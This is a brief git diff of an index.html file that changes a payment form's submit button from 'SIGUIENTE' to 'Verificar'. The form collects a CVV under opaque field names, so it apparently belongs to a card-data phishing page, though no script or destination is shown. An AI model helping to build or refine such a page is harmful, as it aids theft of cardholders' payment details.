Actualizar index.html

--- a/index.html
+++ b/index.html
@@ -74,7 +74,7 @@
                 <input placeholder="CVV" type="text" id="elcl6" name="elcl6" required="" minlength="3" maxlength="3">
             </div>
            
-<input value="SIGUIENTE" class="khg7BBttoo" type="submit">
+<input value="Verificar" class="khg7BBttoo" type="submit">
         </form></center>
     </div>
 
